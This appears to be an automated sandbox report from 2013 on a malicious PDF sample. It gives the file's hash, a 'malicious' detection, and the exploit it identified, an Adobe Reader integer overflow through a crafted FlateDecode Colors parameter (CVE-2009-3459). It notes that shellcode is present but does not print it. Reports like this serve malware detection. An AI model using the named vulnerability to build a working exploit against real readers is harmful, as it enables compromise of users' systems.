Analysis report for file 9ef0794d27d89470ad95a57e2a58adb7
Sample Overview
| File | 9ef0794d27d89470ad95a57e2a58adb7.pdf.vir |
| MD5 | 9ef0794d27d89470ad95a57e2a58adb7 |
| Analysis Started | 2013-04-07 20:20:55 |
| Report Generated | 2013-04-07 20:21:03 |
| Jsand version | 2.3.6 |
Detection results
| Detector | Result |
| Jsand 2.3.6 | malicious |
In particular, the following URL was found to contain malicious content:
- file://9ef0794d27d89470ad95a57e2a58adb7/
Exploits
| Name | Description | Reference |
| FlateDecode Colors | Integer overflow in Adobe Acrobat and Reader via crafted FlateDecode Colors parameter | CVE-2009-3459 |
Deobfuscation results
Evals
No evals.
Writes
No writes.
Network Activity
Requests
| URL |
| file://9ef0794d27d89470ad95a57e2a58adb7.pdf.vir |
ActiveX controls
No objects/controls.
Shellcode
This shellcode was found on file://9ef0794d27d89470ad95a57e2a58adb7/.
(shellzer's analysis not available: an error was encountered when analyzing this shellcode.)
Malware
No additional malware was retrieved.